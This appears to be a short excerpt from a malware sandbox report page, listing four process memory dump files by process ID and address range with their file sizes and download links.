memory/4848-210-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/4848-241-0x00000000011B0000-0x00000000015B8000-memory.dmp

Filesize
4.0MB

Download
memory/4980-189-0x0000000000C90000-0x0000000001054000-memory.dmp

Filesize
3.8MB

Download
memory/4980-192-0x0000000074D20000-0x00000000754D0000-memory.dmp

Filesize
7.7MB

Download